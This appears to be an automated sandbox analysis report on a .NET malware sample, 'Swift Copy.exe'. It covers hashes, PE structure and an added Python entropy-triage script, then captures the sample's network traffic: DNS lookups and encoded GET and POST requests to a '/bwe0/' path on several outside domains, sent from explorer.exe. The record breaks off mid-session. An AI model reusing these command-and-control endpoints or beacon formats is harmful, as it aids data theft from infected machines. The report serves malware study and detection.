                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Swift Copy.exe
                                                File size:951808
                                                MD5:50d4fb3f5a33007c2f80e5bbaa5e0ccd
                                                SHA1:26ff500d90184b5e7928cb16e92bbe0e4553e95e
                                                SHA256:0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
                                                SHA512:d6e46c5187ce7ad3021e22937ab20207672bdbd936473a56c78fba26bdc20ada47b3f1c21b6058a4941965a60fe37a18cbef95a19ba9a216f4fe726f1929f7ef
                                                SSDEEP:12288:V5RNKS2+vpc++24ATV3l7DnJE8Y9FFyUaOzNsC7qZJSPlestx70M2TgN/0seI+r:z1jpSwTFJq79FFyrW6Cs+tJegiDr
                                                TLSH:6815AEEEBA88C45BCF244670F84955F52B66ECE1F021D9AFA893BC31F17229E1117D06
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.b.................r..........n.... ........@.. ....................................@................................
                                                Icon Hash:00684068688eb200
                                                Entrypoint:0x4d906e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F46401 [Thu Aug 11 02:05:53 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]    ; indirect jump through the single IAT slot (directory RVA 0x2000 + image base 0x400000), i.e. mscoree!_CorExeMain: the standard native entry stub of a .NET executable
add byte ptr [eax], al       ; repeated 97 times in the original listing: the bytes after the stub are zero padding, and 00 00 decodes as this instruction
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd9014          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xda000          0x10eb8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xec000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xd7074       0xd7200   False     0.6689424753050552   data       7.431867015823937    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xda000          0x10eb8       0x11000   False     0.06833065257352941  data       4.159011021337183    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xec000          0xc           0x200     False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size     Type                                                                                           Language  Country
RT_ICON        0xda130  0x10828  data
RT_GROUP_ICON  0xea958  0x14     data
RT_VERSION     0xea96c  0x398    data
RT_MANIFEST    0xead04  0x1b4    XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
DLL          Import
mscoree.dll  _CorExeMain
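The static fields above are what a triage script checks before any dynamic run: a single native import (mscoree!_CorExeMain), a non-empty COM descriptor directory at RVA 0x2008, an entry stub that jumps through the IAT at 0x402000, and a .text section at 7.43 bits of entropy, far above what plain CIL normally measures. The Python below is an added example by the editor, not Joe Sandbox's or the sample's code. The section and directory values are copied from this report's tables; the entropy function reproduces the 8-bit Shannon measure used by the "Entropy (8bit)" column; the thresholds (7.0 bits, a 2x virtual-to-raw size ratio) and the reading of a high-entropy managed .text as an embedded, encrypted or compressed payload are the editor's assumptions.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for empty or constant input, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Section rows constructed from this report's section table.
SECTIONS = [
    {"name": ".text", "vaddr": 0x2000, "vsize": 0xd7074, "raw": 0xd7200,
     "entropy": 7.431867015823937, "chars": {"CODE", "EXECUTE", "READ"}},
    {"name": ".rsrc", "vaddr": 0xda000, "vsize": 0x10eb8, "raw": 0x11000,
     "entropy": 4.159011021337183, "chars": {"INITIALIZED_DATA", "READ"}},
    {"name": ".reloc", "vaddr": 0xec000, "vsize": 0xc, "raw": 0x200,
     "entropy": 0.10191042566270775, "chars": {"INITIALIZED_DATA", "DISCARDABLE", "READ"}},
]
# (RVA, size) of the non-empty data directories from this report.
DATA_DIRS = {"IAT": (0x2000, 0x8), "COM_DESCRIPTOR": (0x2008, 0x48), "IMPORT": (0xd9014, 0x57)}
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}
IMAGE_BASE = 0x400000
ENTRY_JMP_TARGET = 0x402000  # operand of the entry stub 'jmp dword ptr [00402000h]'

HIGH_ENTROPY = 7.0      # assumption: code sections at or above this are packed/encrypted
VSIZE_RAW_RATIO = 2.0   # assumption: virtual size this much larger than raw size = unpack room


def is_dotnet(data_dirs, imports):
    """Managed PE: CLR header directory present and the only native import is mscoree.dll."""
    _rva, size = data_dirs.get("COM_DESCRIPTOR", (0, 0))
    return size != 0 and list(imports) == ["mscoree.dll"]


def triage_sections(sections, dotnet, data_dirs, image_base, entry_jmp_target):
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = []
    iat_rva, iat_size = data_dirs["IAT"]
    if not (image_base + iat_rva <= entry_jmp_target < image_base + iat_rva + iat_size):
        findings.append("entry stub does not jump through the IAT: unusual for a CLR loader stub")
    for s in sections:
        if "EXECUTE" in s["chars"] and "WRITE" in s["chars"]:
            findings.append(f"{s['name']}: writable and executable section")
        if s["raw"] > 0 and s["vsize"] > s["raw"] * VSIZE_RAW_RATIO:
            findings.append(f"{s['name']}: virtual size far exceeds raw size (room for unpacking)")
        if "EXECUTE" in s["chars"] and s["entropy"] >= HIGH_ENTROPY:
            why = ("managed code section at this entropy is consistent with an embedded "
                   "encrypted/compressed payload" if dotnet else "high-entropy native code section")
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f} >= {HIGH_ENTROPY}; {why}")
    return findings


if __name__ == "__main__":
    managed = is_dotnet(DATA_DIRS, IMPORTS)
    print("managed PE:", managed)
    for line in triage_sections(SECTIONS, managed, DATA_DIRS, IMAGE_BASE, ENTRY_JMP_TARGET):
        print("-", line)
```

Run against the values from this report the script produces a single finding, on .text, which matches the report's own ".NET source code contains potential unpacker" signature: the managed stub is ordinary, and the interesting bytes are whatever the 7.4-bit .text section decrypts at runtime.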
TCP packets
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Aug 11, 2022 06:29:41.004913092 CEST  49789        80         192.168.2.3     85.159.66.93
Aug 11, 2022 06:29:41.051496029 CEST  80           49789      85.159.66.93    192.168.2.3
Aug 11, 2022 06:29:41.052582026 CEST  49789        80         192.168.2.3     85.159.66.93
Aug 11, 2022 06:29:41.052706957 CEST  49789        80         192.168.2.3     85.159.66.93
Aug 11, 2022 06:29:41.104178905 CEST  80           49789      85.159.66.93    192.168.2.3
Aug 11, 2022 06:29:41.104329109 CEST  49789        80         192.168.2.3     85.159.66.93
Aug 11, 2022 06:29:41.104486942 CEST  49789        80         192.168.2.3     85.159.66.93
Aug 11, 2022 06:29:41.150917053 CEST  80           49789      85.159.66.93    192.168.2.3
Aug 11, 2022 06:29:46.149816990 CEST  49795        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:46.267714977 CEST  80           49795      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:46.267913103 CEST  49795        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:46.268229961 CEST  49795        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:46.389197111 CEST  80           49795      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:46.389247894 CEST  80           49795      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:46.389276028 CEST  80           49795      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:46.389367104 CEST  49795        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:47.277070045 CEST  49795        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:48.293478012 CEST  49798        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:48.410542011 CEST  80           49798      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:48.410737991 CEST  49798        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:48.410831928 CEST  49798        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:48.527884007 CEST  80           49798      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:48.527945042 CEST  80           49798      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:48.527968884 CEST  80           49798      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:48.528224945 CEST  49798        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:48.533154964 CEST  49798        80         192.168.2.3     192.3.130.2
Aug 11, 2022 06:29:48.649930954 CEST  80           49798      192.3.130.2     192.168.2.3
Aug 11, 2022 06:29:53.595129967 CEST  49819        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:53.627001047 CEST  80           49819      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:53.627124071 CEST  49819        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:53.627378941 CEST  49819        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:53.659173965 CEST  80           49819      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:53.659858942 CEST  80           49819      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:53.659890890 CEST  80           49819      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:53.659977913 CEST  49819        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:54.637404919 CEST  49819        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:55.653481007 CEST  49821        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:55.692890882 CEST  80           49821      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:55.693022013 CEST  49821        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:55.693173885 CEST  49821        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:55.732132912 CEST  80           49821      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:55.733656883 CEST  80           49821      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:55.733702898 CEST  80           49821      51.159.175.169  192.168.2.3
Aug 11, 2022 06:29:55.733865023 CEST  49821        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:55.734193087 CEST  49821        80         192.168.2.3     51.159.175.169
Aug 11, 2022 06:29:55.773124933 CEST  80           49821      51.159.175.169  192.168.2.3
Aug 11, 2022 06:30:00.805016994 CEST  49822        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:01.025130033 CEST  80           49822      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:01.025422096 CEST  49822        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:01.027570009 CEST  49822        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:01.247374058 CEST  80           49822      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:01.248380899 CEST  80           49822      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:01.248414993 CEST  80           49822      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:01.248611927 CEST  49822        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:02.028383017 CEST  49822        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:03.044779062 CEST  49823        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:03.265038013 CEST  80           49823      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:03.265213966 CEST  49823        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:03.300090075 CEST  49823        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:03.519531965 CEST  80           49823      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:03.520287991 CEST  80           49823      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:03.520359993 CEST  80           49823      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:03.520493984 CEST  49823        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:03.520596027 CEST  49823        80         192.168.2.3     103.67.235.120
Aug 11, 2022 06:30:03.739808083 CEST  80           49823      103.67.235.120  192.168.2.3
Aug 11, 2022 06:30:08.932589054 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:09.120799065 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:09.120955944 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:09.121141911 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:09.309082031 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.063811064 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.063870907 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.063914061 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.063941002 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.063992023 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.064032078 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.064073086 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.064121962 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.064165115 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.064174891 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.064208984 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.064254045 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.064273119 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.064316034 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.064666033 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.122713089 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.252357960 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.252438068 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.252470016 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.252516985 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.252537012 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.252578020 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.252595901 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.252636909 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.252654076 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.252696037 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.252713919 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.252753019 CEST  49825        80         192.168.2.3     103.92.235.55
Aug 11, 2022 06:30:10.252772093 CEST  80           49825      103.92.235.55   192.168.2.3
Aug 11, 2022 06:30:10.252810001 CEST  49825        80         192.168.2.3     103.92.235.55
UDP packets
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Aug 11, 2022 06:29:40.930696964 CEST  51391        53         192.168.2.3  8.8.8.8
Aug 11, 2022 06:29:40.999190092 CEST  53           51391      8.8.8.8      192.168.2.3
Aug 11, 2022 06:29:46.130723953 CEST  64452        53         192.168.2.3  8.8.8.8
Aug 11, 2022 06:29:46.148622990 CEST  53           64452      8.8.8.8      192.168.2.3
Aug 11, 2022 06:29:53.546819925 CEST  61380        53         192.168.2.3  8.8.8.8
Aug 11, 2022 06:29:53.592797995 CEST  53           61380      8.8.8.8      192.168.2.3
Aug 11, 2022 06:30:00.766990900 CEST  63146        53         192.168.2.3  8.8.8.8
Aug 11, 2022 06:30:00.802969933 CEST  53           63146      8.8.8.8      192.168.2.3
Aug 11, 2022 06:30:08.537314892 CEST  58625        53         192.168.2.3  8.8.8.8
Aug 11, 2022 06:30:08.931277990 CEST  53           58625      8.8.8.8      192.168.2.3
Aug 11, 2022 06:30:17.436986923 CEST  50778        53         192.168.2.3  8.8.8.8
Aug 11, 2022 06:30:17.702488899 CEST  53           50778      8.8.8.8      192.168.2.3
DNS queries
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class
Aug 11, 2022 06:29:40.930696964 CEST  192.168.2.3  8.8.8.8  0xa222    Standard query (0)  www.blackyaga.xyz        A (IP address)  IN (0x0001)
Aug 11, 2022 06:29:46.130723953 CEST  192.168.2.3  8.8.8.8  0xc076    Standard query (0)  www.expectedclosure.one  A (IP address)  IN (0x0001)
Aug 11, 2022 06:29:53.546819925 CEST  192.168.2.3  8.8.8.8  0xd218    Standard query (0)  www.kinemartigues.com    A (IP address)  IN (0x0001)
Aug 11, 2022 06:30:00.766990900 CEST  192.168.2.3  8.8.8.8  0x4560    Standard query (0)  www.epic45.co.uk         A (IP address)  IN (0x0001)
Aug 11, 2022 06:30:08.537314892 CEST  192.168.2.3  8.8.8.8  0x6161    Standard query (0)  www.mogdento.com         A (IP address)  IN (0x0001)
Aug 11, 2022 06:30:17.436986923 CEST  192.168.2.3  8.8.8.8  0x6147    Standard query (0)  www.posinet1.com         A (IP address)  IN (0x0001)
DNS answers
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                        CName                       Address         Type                    Class
Aug 11, 2022 06:29:40.999190092 CEST  8.8.8.8    192.168.2.3  0xa222    No error (0)  www.blackyaga.xyz           redirect.natrocdn.com                       CNAME (Canonical name)  IN (0x0001)
Aug 11, 2022 06:29:40.999190092 CEST  8.8.8.8    192.168.2.3  0xa222    No error (0)  redirect.natrocdn.com       natroredirect.natrocdn.com                  CNAME (Canonical name)  IN (0x0001)
Aug 11, 2022 06:29:40.999190092 CEST  8.8.8.8    192.168.2.3  0xa222    No error (0)  natroredirect.natrocdn.com                              85.159.66.93    A (IP address)          IN (0x0001)
Aug 11, 2022 06:29:46.148622990 CEST  8.8.8.8    192.168.2.3  0xc076    No error (0)  www.expectedclosure.one                                 192.3.130.2     A (IP address)          IN (0x0001)
Aug 11, 2022 06:29:53.592797995 CEST  8.8.8.8    192.168.2.3  0xd218    No error (0)  www.kinemartigues.com       kinemartigues.com                           CNAME (Canonical name)  IN (0x0001)
Aug 11, 2022 06:29:53.592797995 CEST  8.8.8.8    192.168.2.3  0xd218    No error (0)  kinemartigues.com                                       51.159.175.169  A (IP address)          IN (0x0001)
Aug 11, 2022 06:30:00.802969933 CEST  8.8.8.8    192.168.2.3  0x4560    No error (0)  www.epic45.co.uk                                        103.67.235.120  A (IP address)          IN (0x0001)
Aug 11, 2022 06:30:08.931277990 CEST  8.8.8.8    192.168.2.3  0x6161    No error (0)  www.mogdento.com            mogdento.com                                CNAME (Canonical name)  IN (0x0001)
Aug 11, 2022 06:30:08.931277990 CEST  8.8.8.8    192.168.2.3  0x6161    No error (0)  mogdento.com                                            103.92.235.55   A (IP address)          IN (0x0001)
Aug 11, 2022 06:30:17.702488899 CEST  8.8.8.8    192.168.2.3  0x6147    No error (0)  www.posinet1.com                                        202.172.26.50   A (IP address)          IN (0x0001)
                                                • www.blackyaga.xyz
                                                • www.expectedclosure.one
                                                • www.kinemartigues.com
                                                • www.epic45.co.uk
                                                • www.mogdento.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49789        85.159.66.93    80                C:\Windows\explorer.exe
Timestamp                             kBytes transferred  Direction  Data
Aug 11, 2022 06:29:41.052706957 CEST  1720                OUT        GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1
                                                Host: www.blackyaga.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 11, 2022 06:29:41.104178905 CEST  1720                IN         HTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Thu, 11 Aug 2022 04:29:41 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 9
                                                X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.3  49795        192.3.130.2     80                C:\Windows\explorer.exe
Timestamp                             kBytes transferred  Direction  Data
Aug 11, 2022 06:29:46.268229961 CEST  10116               OUT        POST /bwe0/ HTTP/1.1
                                                Host: www.expectedclosure.one
                                                Connection: close
                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.expectedclosure.one
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.expectedclosure.one/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
                                                Timestamp: Aug 11, 2022 06:29:46.389247894 CEST
                                                kBytes transferred: 10116
                                                Direction: IN
                                                Data: HTTP/1.1 301 Moved Permanently
                                                Server: nginx/1.20.1
                                                Date: Thu, 11 Aug 2022 04:29:46 GMT
                                                Content-Type: text/html
                                                Content-Length: 169
                                                Connection: close
                                                Location: https://www.expectedclosure.one/bwe0/
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                Session ID: 2
                                                Source IP: 192.168.2.3
                                                Source Port: 49798
                                                Destination IP: 192.3.130.2
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe
                                                Timestamp: Aug 11, 2022 06:29:48.410831928 CEST
                                                kBytes transferred: 10122
                                                Direction: OUT
                                                Data: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
                                                Host: www.expectedclosure.one
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Aug 11, 2022 06:29:48.527945042 CEST
                                                kBytes transferred: 10123
                                                Direction: IN
                                                Data: HTTP/1.1 301 Moved Permanently
                                                Server: nginx/1.20.1
                                                Date: Thu, 11 Aug 2022 04:29:48 GMT
                                                Content-Type: text/html
                                                Content-Length: 169
                                                Connection: close
                                                Location: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                Session ID: 3
                                                Source IP: 192.168.2.3
                                                Source Port: 49819
                                                Destination IP: 51.159.175.169
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe
                                                Timestamp: Aug 11, 2022 06:29:53.627378941 CEST
                                                kBytes transferred: 11852
                                                Direction: OUT
                                                Data: POST /bwe0/ HTTP/1.1
                                                Host: www.kinemartigues.com
                                                Connection: close
